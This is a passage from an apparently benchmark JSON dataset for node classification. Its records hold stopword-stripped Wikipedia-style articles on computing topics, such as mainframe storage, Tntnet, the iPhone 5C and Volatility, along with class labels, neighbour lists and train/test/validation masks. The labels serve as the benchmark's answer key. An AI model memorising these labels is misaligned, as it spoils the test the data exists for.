create 2 gigabytes unlike address space dataspace hiperspace contains user data contain system control blocks common areas program code run dataspace hiperspace dataspace differs hiperspace dataspaces byte-addressable whereas hiperspaces page-addressable traditionally ibm mainframe memory byte-addressable kind memory termed central storage ibm mainframe processors much 1980s 1990s supported another kind memory expanded storage expanded storage 4kb-page addressable application wants access data expanded storage must first moved central storage similarly data movement central storage expanded storage done multiples 4kb pages initially page movement performed using relatively expensive instructions paging subsystem code overhead moving single groups pages central expanded storage reduced introduction mvpg move page instruction admf asynchronous data mover facility capability mvpg instruction admf explicitly invoked—generally middleware z/os z/vm acp —to access data expanded storage uses namely mid-1990s central expanded storage physically different areas memory processor since mid-1990s central expanded storage merely assignment choices underlying processor memory choices made based specific expected uses example expanded storage required hiperbatch function uses mvpg instruction access hiperspaces addition hiperspace paging cases mentioned uses expanded storage including z/os removed support expanded storage memory z/os central storage z/vm continues support expanded storage ibm described mvpg moves single page central processor execute instructions page move completed mvpg mainframe instruction move page opcode x'b254 compared mvcl move character long instruction move 256 bytes within main memory using single instruction instructions comply definitions atomicity although used single instruction within documented timing non-overlap restrictions need move 256 bytes within main memory historically addressed software mvc loops mvcl introduced 1970 announcement system/370 mvpg patented announced ibm 1989 advantages admf asynchronous data mover facility introduced 1992 goes beyond capabilities mvpg move page instruction limited single page move groups pages central expanded storage macro instruction named iosadmf described api avoids direct low-level use admf used read write data hiperspace hiperspaces created using dspserv create provide reentrancy iosadmf used together list form execute form z/vse version 4 z/tpf version 1 z/vm version 5 operating systems presumably successors require z/architecture z/architecture supports running multiple concurrent operating systems applications even use different address sizes allows software developers choose address size advantageous applications data structures platform solutions inc. psi previously marketed itanium-based servers compatible z/architecture ibm bought psi july 2008 psi systems longer available flex-es zpdt hercules emulator also implement z/architecture hitachi mainframes running newer releases vos3 operating system implement esa/390 plus hitachi-unique cpu instructions including 64-bit instructions hitachi likely inspired z/architecture formally collaborated ibm z900-g2/z800 cpus introduced 2002 hitachi machines z/architecture-compatible july 7 2009 ibm occasion announcing new version one operating systems implicitly stated architecture level set 4 als 4 exists implemented system z10 subsequent machines als 4 also specified loadxx archlvl 3 whereas earlier z900 z800 z990 z890 system z9 specified archlvl 2 earlier announcements system z10 simply specified implements z/architecture additions 50+ new machine instructions 1 mb page frames hardware decimal floating point unit hdfu",
    "neighbors": [
      7173,
      6664,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      10786,
      6181,
      8231,
      10796,
      3630,
      6705,
      7218,
      7733,
      2623,
      2113,
      7234,
      2638,
      2138,
      3175,
      8815,
      2168,
      6268,
      3197,
      2179,
      7313,
      663,
      1176,
      4255,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      2745,
      8890,
      4286,
      8900,
      9932,
      5329,
      1235,
      10966,
      731,
      11487,
      7911,
      4841,
      10985,
      9964,
      5358,
      1776,
      2805,
      249,
      3323,
      2811,
      4862,
      1798,
      8966,
      1801,
      10508,
      6926,
      6415,
      11539,
      2339,
      6950,
      3886,
      7983,
      10543,
      1841,
      309,
      8501,
      8502,
      5948,
      8514,
      3911,
      4423,
      7505,
      9044,
      344,
      2910,
      863,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      7053,
      3470,
      5518,
      8077,
      8078,
      5523,
      407,
      409,
      11673,
      10658,
      9126,
      10669,
      1967,
      2480,
      11184,
      10675,
      1461,
      5557,
      1463,
      4030,
      453,
      6087,
      466,
      4565,
      1499,
      1501,
      7134,
      5090,
      995,
      7653,
      5094,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 7608,
    "label": 8,
    "text": "Tntnet:tntnet tntnet web server software coded c++ enables c++ programs bundle requests modules enables developing web applications c++ get post requests interpreted tntnet server sent web application program send reply back network tntnet free software released gnu lesser general public license lgpl tntnet provides many features script-based cgi different tradeoffs c++ based tntnet allows use methods object-oriented programming polymorphism also supported modern scripting languages tntnet web application compiled ahead time script-based cgis often interpreted compiled modules native generally faster scripts programs cgid fastcgi used improve performance script-based cgis tntnet directly integrates web application webserver webservers often apis apache http server uses module system internet information services iis uses internet server application programming interface isapi tntnet originally used apache module system changed due difficulty interfacing apache c api maintaining benefits using c++ situation tommi mäkitalo developed tntnet framework tntnet also webserver present source code way tntnet acts layer front actual web application use webserver part receives http requests interpretes sends binary web application part web application webserver communicate constantly extra libraries provide tools programmer tntnet uses library tools named cxxtools build applications written using tntnet cxxtools needed library tntdb database abstraction layer programs developed using tntdb depend specific type underlying database system tntdb handle following database systems",
    "neighbors": [
      225,
      865,
      10340,
      9481,
      5546,
      7022,
      7983,
      4658,
      1556,
      1812,
      5492,
      823,
      9780,
      8539,
      2045,
      4439
    ],
    "mask": "Test"
  },
  {
    "node_id": 7609,
    "label": 9,
    "text": "Unspecified_behavior:unspecified behavior unspecified behavior behavior may vary different implementations programming language program said contain unspecified behavior source code may produce executable exhibits different behavior compiled different compiler compiler different settings indeed different parts executable respective language standards specifications may impose range possible behaviors exact behavior depends implementation may completely determined upon examination program source code unspecified behavior often manifest resulting program external behavior may sometimes lead differing outputs results potentially causing portability problems enable compilers produce optimal code respective target platforms programming language standards always impose certain specific behavior given source code construct failing explicitly define exact behavior every possible program considered error weakness language specification would infeasible c c++ languages non-portable constructs generally grouped three categories implementation-defined unspecified undefined behavior exact definition unspecified behavior varies c++ defined behavior well-formed program construct correct data depends implementation c++ standard also notes range possible behaviors usually provided unlike implementation-defined behavior requirement implementation document behavior similarly c standard defines behavior standard provides two possibilities imposes requirements chosen instance unspecified behavior different undefined behavior latter typically result erroneous program construct data requirements placed translation execution constructs c c++ distinguish implementation-defined behavior unspecified behavior implementation-defined behavior implementation must choose particular behavior document example c/c++ size integer data types choice behavior must consistent documented behavior within given execution program many programming languages specify order evaluation sub-expressions complete expression non-determinism allow optimal implementations specific platforms e.g utilise parallelism one sub-expressions side effects result evaluating full-expression may different depending order evaluation sub-expressions example given codice_1 codice_2 modify codice_3 result stored codice_4 may different depending whether codice_5 codice_6 evaluated first c c++ languages also applies function arguments example resulting program write two lines output unspecified order languages java order evaluation operands function arguments explicitly defined",
    "neighbors": [
      1952,
      1316,
      8773,
      8262,
      7627,
      10571,
      1613,
      5677,
      335,
      4057
    ],
    "mask": "Test"
  },
  {
    "node_id": 7610,
    "label": 3,
    "text": "Feud_(video_game):feud video game feud 1987 computer game msx zx spectrum home computers among others player takes role sorcerer learic cursed aging must fight evil twin leanoric time runs first game mastertronic distributed bulldog software label countries distributed halloween learic leanoric twins powerful sorcerers hated one day leanoric cast aging curse learic learic player one day defeat leanoric dying real enemy leanoric achieve objective player must collect many herbs scattered across map mix cauldron make offensive defensive spells spells vary fireballs lightning invisibility even turning peaceful villagers zombies compass indicates leanoric location several herbs found garden tended gardener gardener though slow-moving also able inflict damage learic leanoric non-player character thing collecting herbs mix cauldron hunting order attack version game translated brazilian portuguese contains bug causes lock using sprites spell translated version devas",
    "neighbors": [
      9166,
      10931,
      4405,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 7611,
    "label": 9,
    "text": "MINC:minc minc minc c data specification language written mid-1980s princeton university graduate student named lars graf kind naming known recursive acronym contains many though syntactical capabilities c programming language used implement simple procedural programs executed runtime parser say minc need compiled way minc continues used handful programs written 1980s e.g real-time cmix intents purposes superseded modern scripting languages perl python tcl controversial aspect language whether pronounced mink min-see",
    "neighbors": [
      8582,
      8554,
      7535,
      692,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7612,
    "label": 9,
    "text": "Statement_(computer_science):statement computer science computer programming statement syntactic unit imperative programming language expresses action carried program written language formed sequence one statements statement may internal components e.g. expressions many imperative languages e.g c make distinction statements definitions statement containing executable code definition instantiating identifier expression evaluates value distinction also made simple compound statements latter may contain statements components following major generic kinds statements pseudocoded pseudocoded statements immediate corresponding syntax typical imperative language like pascal c fortran etc appearance statements shapes look programs programming languages characterized type statements use e.g curly brace language family many statements introduced identifiers like repeat often statement keywords reserved used names variables functions imperative languages typically use special syntax statement looks quite different function calls common methods describe syntax statements backus–naur form syntax diagrams semantically many statements differ subroutine calls handling parameters usually actual subroutine parameter evaluated subroutine called contrasts many statement parameters evaluated several times e.g condition loop e.g loop body loop technically statement parameters call-by-name parameters call-by-name parameters evaluated needed see also lazy evaluation call-by-name parameters available statement like behaviour implemented subroutines see lisp languages without call-by-name parameters semantic description loop conditional usually beyond capabilities language therefore standard documents often refer semantic descriptions natural language languages statements contrast expressions statements return results executed solely side effects expressions always return result often side effects among imperative programming languages algol 68 one statement return result languages mix imperative functional styles lisp family distinction expressions statements made even expressions executed sequential contexts solely side effects whose return values used considered 'expressions purely functional programming statements everything expression distinction frequently observed wording statement executed expression evaluated found codice_17 codice_18 functions found languages python found codice_17 applied statements codice_18 applied expressions languages fixed set statements defined language experiments extensible languages allow programmer define new statements",
    "neighbors": [
      5635,
      3462,
      6536,
      6160,
      155,
      9245,
      8226,
      9634,
      5415,
      9385,
      2105,
      2620,
      10560,
      963,
      5316,
      8262,
      10568,
      1611,
      7627,
      8524,
      9804,
      9188,
      8037,
      6502,
      7273,
      8554,
      9454,
      240,
      9714,
      6775,
      3960,
      8188,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7613,
    "label": 8,
    "text": "GeoNames:geonames geonames geographical database available accessible various web services creative commons attribution license geonames database contains 25,000,000 geographical names corresponding 11,800,000 unique features features categorized one nine feature classes subcategorized one 645 feature codes beyond names places various languages data stored include latitude longitude elevation population administrative subdivision postal codes coordinates use world geodetic system 1984 wgs84 data accessible free charge number web services daily database export core geonames database provided official public sources quality may vary wiki interface users invited manually edit improve database adding correcting names move existing features add new features etc geonames feature represented web resource identified stable uri uri provides access content negotiation either html wiki page rdf description feature using elements geonames ontology ontology describes geonames features properties using web ontology language feature classes codes described skos language wikipedia articles url linked rdf descriptions geonames data linked dbpedia data rdf linked data crowdsourcing schemes geonames edit interface allows everyone sign edit database hence false information entered information remain undetected especially places accessed frequently studies inaccuracies classifies loss granularity coordinates e.g. due truncation low-resolution geocoding cases wrong feature codes near-identical places placement places outside designated countries manually correcting inaccuracies tedious error prone due database size may require experts literature provides works automatically resolving computing boundary information help detect inconsistencies near-identical places placement locations cities wrong parents provinces countries singh rafiei show boundary information derived work move 20 locations geonames better positions spatial hierarchy accuracy moves 90",
    "neighbors": [
      10020,
      53
    ],
    "mask": "None"
  },
  {
    "node_id": 7614,
    "label": 2,
    "text": "IPhone_5C:iphone 5c iphone 5c marketed stylized lowercase c iphone 5c smartphone designed marketed apple inc sixth generation iphone device part iphone series unveiled september 10 2013 released september 20 2013 along higher-end counterpart iphone 5s iphone 5c variant iphone 5 similar hardware specifications hard-coated polycarbonate shell instead aluminium original iphone 5 iphone 5c available several color options shipped ios 7 iphone 5c sold discounted price point comparison 5s unlike apple usual practice lowering price previous model upon release new version iphone 5 explicitly discontinued replaced 5c september 9 2014 16 32 gb iphone 5c models replaced 8 gb model announcement iphone 6 iphone 6 plus september 9 2015 8 gb version discontinued iphone 6s announced iphone 5c redesigned using polycarbonate housing strengthened steel band however due material design changes phone weighs 132 grams 20 grams heavier 5 5s still lighter older iphone models design iphone 5c also considerably thicker closely similar design ipod touch 5th generation models also available variety colors different coating finish minor changes include different camera assembly design mute/ringer switch iphone received positive reviews design claiming durable iphone ever unlike subsequent models excluding iphone xr iphone 5c offered several colours blue green yellow coral pink white features ios apple mobile operating system user interface ios based concept direct manipulation using multi-touch gestures interlock control elements consist sliders switches buttons interaction os includes gestures swipe tap pinch reverse pinch specific definitions within context ios operating system multi-touch interface internal accelerometers used applications respond shaking device one common result undo command rotating vertically one common result switching portrait landscape mode iphone 5c supplied ios 7 released september 20 2013 jony ive designer ios 7 new elements described update bringing order complexity highlighting features refined typography new icons translucency layering physics gyroscope-driven parallaxing major changes design design ios 7 os x mavericks version 10.9 noticeably depart skeuomorphic elements green felt game center wood newsstand leather calendar favor flatter graphic design phone act hotspot sharing internet connection wi-fi bluetooth usb also accesses app store online application distribution platform ios developed maintained apple service allows users browse download applications itunes store developed xcode ios sdk published apple ios 7 adds airdrop ad-hoc wi-fi sharing platform users share files iphone 5 onwards ipod touch 5th generation ipad 4th generation ipad mini operating system also adds control center gives ios users access commonly used controls apps swiping screen–including lock screen–users things switch airplane mode turn wi-fi adjust display brightness similar basic functions device also includes new integrated flashlight function operate reverse camera flash led flashlight functions media player includes apple maps passbook mapping application includes turn-by-turn navigation spoken directions 3d views major cities real-time traffic users rotate device horizontally landscape mode access collage album covers 5c includes siri intelligent personal assistant knowledge navigator application uses natural language user interface answer questions make recommendations perform actions delegating requests set web services apple claims software adapts user individual preferences time personalizes results ios 7 adds new male female voices new system setting functionalities redesign match rest operating system integration twitter wikipedia bing photos highest operating system supports currently ios 10 2016. ios 11 support iphone phone ceased production september 2015 also 32-bit iphone facebook comes integrated apple native apps facebook features directly accessed within native apps calendar sync facebook events use facebook like button within apple app store itunes radio internet radio service also included iphone 5c free ad-supported service available itunes users featuring siri integration ios users able skip tracks customize stations purchase station songs itunes store users also search history previous songs iphone 5c uses hardware iphone 5 minor changes iphone 5c uses system chip soc called apple a6 chip powered iphone 5 soc comprises 1.3 ghz dual-core processor 1 gb ram tri-core powervr sgx543mp3 running 266 mhz. ref name= geekbench test 28/9 /ref iphone 5c new lte antennas cover lte bands smartphone according apple device made unibody hard-coated polycarbonate body steel-reinforced frame also acts antenna iphone 5c available multiple bright colors back — blue green pink yellow white black glass front features 4-inch retina multi-touch display 640×1136 pixel resolution storage capacities available fixed 8 16 32 gb plug-in memory card supported iphone 5c retains 8 mp back camera similar iphone 5 different camera assembly front camera accessible facetime camera app lower resolution 1.2 megapixels rechargeable lithium-ion battery charge capacity 1510mah slightly improved upon iphone 5 1440mah battery integrated replaced user rated ≤225 hours standby time ≤8 hours talk time iphone 5c lacks major new features introduced iphone 5s iphone 5s touch id fingerprint scanner also 64-bit a7 soc m7 motion co-processor however iphone 5c support snapping still photos video recording 3x digital zooming iphone 5c uses nano sim card iphone 5s iphone 5 iphone media event apple announced case iphone 5c available six colors black white pink yellow blue green holes cut case show color iphone back case making almost two-tone looking device although resulted “ iphone ” inscription back appear “ hon. ” cases phone colors make thirty different color combinations inside case lined soft microfiber outside made silicone first time apple released case iphone since iphone 4 iphone 4 bumpers apple also released previously announced dock iphone 5c first time apple made dock since iphone 4 dock received overwhelmingly negative reviews apple online store due incompatibility phone cases iphone 5c received generally mixed reviews phone regarded solid polycarbonate shell considered downgrade lacked 'premium look feel compared aluminum bodies iphone 5 iphone 5s reviewers generally noted iphone 5s offered features thanks 64-bit a7 soc m7 motion co-processor storage space relatively small additional upfront cost 650 usd versus 550 usd march 2014 iphone 5c period phones sold side side 8 gb version iphone 5c released 2014 described unusable 4.9gb available user installing ios 8 contrast iphone 5s offers minimum 16 gb storage iphone 5c regarded expensive compete affordable flagship smartphones nexus 5 oneplus one smartphones designed developing markets moto g. iphone 5s 5c sold nine million units first three days set record first weekend smartphone sales 5s selling three times units iphone 5c first day release 1 iphone us iphone 5s 0.3 iphone 5c. ref name= cnet ip5s/c sales 1 /ref commentators viewed iphone 5c flop supply chain cuts signifying decline demand october 2013 apple ceo tim cook admitted company overstocked iphone 5c shortages iphone 5s result failing anticipate sales ratio phones six months release iphone 5c march 25 2014 apple announced sales iphone line crossed 500 million units break many units iphone 5c iphone 5c among top three best selling phones us three months launch",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      91,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      10478,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10020,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2383,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      8046,
      10608,
      11137,
      2439,
      6023,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      5058,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 7615,
    "label": 2,
    "text": "Windows_HPC_Server_2008:windows hpc server 2008 windows hpc server 2008 released microsoft 22 september 2008 successor product windows compute cluster server 2003 like wccs windows hpc server 2008 designed high-end applications require high performance computing clusters hpc stands high performance computing version server software claimed efficiently scale thousands cores includes features unique hpc workloads new high-speed networkdirect rdma highly efficient scalable cluster management tools service-oriented architecture soa job scheduler mpi library based open-source mpich2 cluster interoperability standards high performance computing basic profile hpcbp specification produced open grid forum ogf june 2008 system built collaboratively national center supercomputing applications ncsa microsoft ranked 23 top500 list ranking world fastest supercomputers linpack score 68.5 teraflops ncsa supercomputer uses windows server hpc red hat enterprise linux 4 november 2011 ranking dropped 253 since windows computers dropped top500 list linux also replaced operating systems list november 2008 rankings published top500 windows hpc system built shanghai supercomputer center achieved peak performance 180.6 teraflops ranked 11 list june 2015 last windows machine left list dropped later ranked 436 barely made top500 windows azure dropping earlier windows hpc server 2008 r2 based windows server 2008 r2 released 20 september 2010 windows hpc server 2008 r2 microsoft released hpc pack 2008 r2 four flavors express enterprise workstation cycle harvesting later simplified offer releasing hpc pack 2012 combined capabilities four versions hpc pack 2008 r2 hpc pack 2012 installed top windows server 2012 standard datacenter",
    "neighbors": [
      8576,
      641,
      10625,
      3463,
      7432,
      651,
      4107,
      6797,
      8080,
      3857,
      8976,
      10896,
      2196,
      11283,
      4505,
      5273,
      4515,
      11301,
      3496,
      6441,
      6697,
      1581,
      3250,
      3890,
      9910,
      6462,
      321,
      7106,
      582,
      5830,
      1098,
      10957,
      9173,
      11605,
      2391,
      3289,
      4316,
      8798,
      11103,
      5600,
      1761,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      9448,
      10989,
      5103,
      7935,
      7796,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7616,
    "label": 9,
    "text": "RPL_(programming_language):rpl programming language /ref rpl derived reverse polish lisp according original developers whilst short 1987 hp marketing attempted coin backronym rom-based procedural language handheld calculator operating system application programming language used hewlett-packard scientific graphing rpn reverse polish notation calculators hp 28 48 49 50 series also usable non-rpn calculators 38 39 40 series rpl structured programming language based rpn equally capable processing algebraic expressions formulae implemented threaded interpreter rpl many similarities forth languages stack-based well list-based lisp contrary previous hp rpn calculators fixed four-level stack stack used rpl limited available calculator ram rpl originated hp corvallis oregon development facility 1984 replacement previous practice implementing operating systems calculators assembly language last pocket calculator supporting rpl hp 50g discontinued 2015 however multiple emulators emulate hp rpl calculators exist run range operating systems devices including ios android smartphones internal low- medium-level variant rpl called system rpl sysrpl used earlier hp calculators well aforementioned ones part operating system implementation language hp 48 series variant rpl accessible calculator user without use external tools hp 49/50 series compiler built rom use sysrpl possible cause serious crash coding sysrpl caution must used using high-level user rpl userrpl version language available said graphing calculators developing textual well graphical application programs userrpl programs internally represented sysrpl programs use safe subset available sysrpl commands error checking part userrpl commands however makes userrpl programs noticeably slower equivalent sysrpl programs userrpl command syseval tells calculator process designated parts userrpl program sysrpl code rpl control blocks strictly postfix although notable exceptions control block structures appear would standard infix language calculator manages allowing implementation blocks skip ahead program stream necessary rpl supports basic conditional testing if/then/else structure basic syntax block following example tests see number bottom stack 1 replaces equal one construct evaluates condition tests bottom stack result result rpl optionally support forth-style blocks allowing condition determined block leaving condition empty statement make changes stack condition execution use existing result bottom stack test postfix conditional testing may accomplished using ift if-then ifte if-then-else functions ift ifte pop two three commands stack respectively topmost value evaluated boolean true second topmost value pushed back stack ifte allows third else value pushed back stack boolean false following example uses ift function pop object bottom stack equal 1 replaces one following example uses ifte function pop object bottom stack equal 1 replaces one equal 1 replaces string one ift ifte evaluate program block given one arguments allowing compact form conditional logic if/then/else/end structure following example pops object bottom stack replaces one less depending whether equal less greater 1 support complex conditional logic rpl provides case/then/end structure handling multiple exclusive tests one branches within case statement executed basic syntax block following code illustrates use case/then/end block given letter bottom stack replaces string equivalent unknown letter code identical following nested if/then/else/end block equivalent rpl provides for/next statement looping one index another index loop stored temporary local variable accessed loop syntax for/next block following example uses loop sum numbers 1 10 index variable loop start/next block used simple block runs start index end index unlike for/next loop looping variable available syntax start/next block for/next start/next support user-defined step increment replacing terminating next keyword increment step keyword loop variable incremented decremented different value default +1 instance following loop steps back 10 2 decrementing loop index 2 while/repeat/end block rpl supports indefinite loop condition test start loop syntax while/repeat/end block do/until/end block rpl supports indefinite loop condition test end loop syntax do/until/end block",
    "neighbors": [
      4992,
      9345,
      10752,
      11269,
      3334,
      6919,
      5384,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      797,
      3869,
      2335,
      6047,
      10012,
      8226,
      4516,
      5031,
      9128,
      5803,
      7983,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      3904,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      205,
      1613,
      2383,
      11218,
      9299,
      10712,
      3034,
      3675,
      477,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5354,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7617,
    "label": 2,
    "text": "Nokia_5530_XpressMusic:nokia 5530 xpressmusic nokia 5530 xpressmusic smartphone nokia announced june 15 2009 part xpressmusic series phones emphasizes music multimedia playback nokia third touchscreen phone 5800 n97 based symbian os s60 5th edition platform terms specifications rests lower nokia 5230 higher 5800 bearing much lower price tag lacks 5800 3g capability gps receiver compact sleek design models well stereo speakers",
    "neighbors": [
      1537,
      8577,
      6276,
      3205,
      11271,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      1833,
      3626,
      5290,
      10410,
      9137,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1216,
      1728,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Train"
  },
  {
    "node_id": 7618,
    "label": 4,
    "text": "Volatility_(memory_forensics):volatility memory forensics volatility open-source memory forensics framework incident response malware analysis written python supports microsoft windows mac os x linux version 2.5 volatility created computer scientist entrepreneur aaron walters drawing academic research memory forensics volatility supports investigations following memory images windows mac osx linux volatility supports variety sample file formats ability convert formats",
    "neighbors": [
      3395,
      2275,
      5284,
      8554,
      6797,
      7983,
      7605,
      823,
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7619,
    "label": 4,
    "text": "Alisa_Shevchenko:alisa shevchenko alisa shevchenko also known alisa esage шевченко russian hacker recognised working companies find vulnerabilities systems self-described “ offensive security researcher ” 2014 profile national geographic says shevchenko 'she drawn hacking programming dropping school worked virus analytics expert kaspersky labs five years 2009 founded company esage labs later known цои security russian acronym stands цифровое оружие и защита “ digital weapons defense. ” shevchenko company цои security placed list us sanctioned agents accused helping vladimir putin bid swing 2016 election trump regarding white house accusations shevchenko stated record authorities either misinterpreted facts deceived shevchenko winner phdays iv critical infrastructure attack contest successfully hacking fake smart city detecting several zero-day vulnerabilities indusoft web studio 7.1 schneider electric alisa also awarded zero day initiative zdi owned u.s. tech giant hp uncovering two vulnerabilities microsoft products 2014 work featured security industry publication virus bulletin regarding driving motivations alisa shevchenko said kinda ironic still aspiring inspire women obvious anti-hero wonder google government- ltd global player big gov'ts clashing absurdity show private security firm wapack labs part corporate/cyber intelligence sharing community red sky alliance claim former employee shevchenko company цои security responsible blackenergy virus blackenergy virus used targets georgia ukraine prior russian invasions nations poland belgium also targeted malware attacks using blackenergy virus malware thought created person persons connected persons linked using security services codename sandworm connections made instagram shevchenko software industry developer peter david carter",
    "neighbors": [
      7809,
      4830
    ],
    "mask": "None"
  },
  {
    "node_id": 7620,
    "label": 4,
    "text": "Juliana_Mickwitz:juliana mickwitz juliana mickwitz 1889-1976 finnish-born russian became naturalized american citizen employed american military later national security agency translator linguist cryptanalyst inducted cryptologic hall honor 2012 juliane charlotte ernestine von mickwitz born elisabeth marie caroline née von dittmann ernst theodor leopold von mickwitz aka mikvits minckwitz 15 may 1889 vyborg grand duchy finland russian empire grandfather estate called halila oldest two children brother alexander would later join united states learning english german russian home tutor entered st ann gymnasium saint petersburg 1903 graduated gold medal excellence 1907 tutored students 1909 year began working secretary michael lazareff president russian unified oil company continued working widow eugenia lazareff death 1919 rise bolsheviks russian civil war mickwitz managed hide assets lazareff turn secured passage poland story mickwitz engaged polish doctor 15 april 1920 two women arrived warsaw mickwitz began trying preserve lazareff assets outside soviet union protect confiscation worked translator various organizations including american consulate warsaw british embassy canadian us timber corporation 1925 year began working foreign correspondent polish agricultural syndicate kooprolna cooperative year applied full-time position american military attaché office 1926 mickwitz became employed us military attaché office warsaw working major general william h. colbern colonel r. i. mckenney colonel john winslow general emer yeager thirteen years worked warsaw nazi invasion poland december 1939 transferred rest office hague netherlands taking lazareff aunt months germans invaded low countries office evacuated berlin three months august 1940 relocated athens germans followed july 1941 mickwitz lazareff fled lisbon assistance former employers able secure travel visas united states march 1942 arriving u.s. mickwitz began working war department military intelligence directorate translating german polish russian documents october 1946 released service awarded meritorious civilian service medal month hired army security agency stationed arlington hall 1952 transferred national security agency nsa founded linguistic unit managed translate plaintext voice remained agency 1963 retired receiving second meritorious service award continued consult nsa 1966 inducted cryptologic hall honor 2012 mickwitz member russian orthodox church helped founding construction russian orthodox cathedral st. john baptist washington dc served head parish many years worked establish congress russian americans virginia help russian immigrants became naturalized american citizen mickwitz died 21 august 1976 sacred heart nursing home hyattsville maryland suffering stroke previous november priest greece father nicolas pekatoros officiated funeral",
    "neighbors": [
      7887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7621,
    "label": 4,
    "text": "Active_hard-drive_protection:active hard-drive protection computer hardware active hard-drive protection refers technology attempts avoid reduce mechanical damage hard disk drives preparing disk prior impact approach mainly used laptop computers frequently carried around prone impacts desktop computers usually system consists accelerometers alert system excess acceleration vibration detected software tells hard disk unload heads prevent coming contact platter thus potentially preventing head crash many laptop vendors implemented technology different names hard-disk drives also include technology needing cooperation system",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 7622,
    "label": 3,
    "text": "Sokoban:sokoban sokoban created 1981 hiroyuki imabayashi published december 1982 thinking rabbit software house based takarazuka japan game played board squares square floor wall floor squares contain boxes floor squares marked storage locations player confined board may move horizontally vertically onto empty squares never walls boxes player also move box pushes square beyond boxes may pushed boxes walls pulled number boxes equal number storage locations puzzle solved boxes storage locations 1988 sokoban published us spectrum holobyte soko-ban ibm-pc compatible computers commodore 64 apple ii series game title screen text copyright 1984 ascii corp. reference copyrights publishing date review computer gaming world praised game pure simple playable mentally challenging citing addictive qualities also reviewed dragon giving 4½ 5 stars sokoban hit japan sold 400,000 units country time spectrum holobyte imported united states implementations sokoban written numerous computer platforms including almost home computer personal computer systems versions also exist video game consoles mobile phones graphic calculators digital cameras electronic organizers sokoban studied using theory computational complexity problem solving sokoban puzzles proven np-hard work showed significantly difficult np problems pspace-complete also interesting artificial intelligence researchers solving sokoban compared automated planning needs done robot moves boxes warehouse sokoban difficult due branching factor comparable chess also enormous search tree depth levels extended indefinitely iteration requiring exponentially growing number moves pushes skilled human players rely mostly heuristics usually able quickly discard futile redundant lines play recognize patterns subgoals drastically cutting amount search sokoban puzzles solved automatically using single-agent search algorithm ida* enhanced several techniques make use domain-specific knowledge method used rolling stone sokoban solver developed university alberta games group complex sokoban levels however reach even best automated solvers several puzzles considered variants original sokoban game sense make use controllable character pushes boxes around maze alternative tilings standard game mazes laid square grid several variants apply rules sokoban mazes laid tilings hexoban uses regular hexagons trioban uses equilateral triangles multiple pushers variants multiban interlock player control multiple characters alternative goals several variants adjust requirements completing level example block-o-mania boxes different colours goal push onto squares matching colours sokomind plus implements similar idea boxes target squares uniquely numbered interlock sokolor boxes also different colours goal move similarly coloured boxes adjacent cyberbox level designated exit square goal reach exit variant called beanstalk elements level must pushed onto goal fixed sequence additional game elements push crate sokonex xsok cyberbox block-o-mania add new elements basic puzzle examples include holes teleports moving blocks one-way passages character actions pukoban character pull boxes addition pushing destructible walls early sokoban 1982 nec pc-8801 game featured levels destructible walls order solve levels player make destructible wall elements disappear walking wall push certain side unwalkable targets variants make empty target tiles unwalkable becoming walkable occupied crate common sokoban-type levels lasertank chip challenge reverse mode player solves puzzle backwards end initial position pulling instead pushing boxes standard sokoban puzzles played reverse mode reverse mode solutions converted solutions standard-mode puzzles therefore reverse mode also instrumental solving standard sokoban puzzles",
    "neighbors": [
      9735,
      7019,
      6129,
      6867,
      1787
    ],
    "mask": "None"
  },
  {
    "node_id": 7623,
    "label": 4,
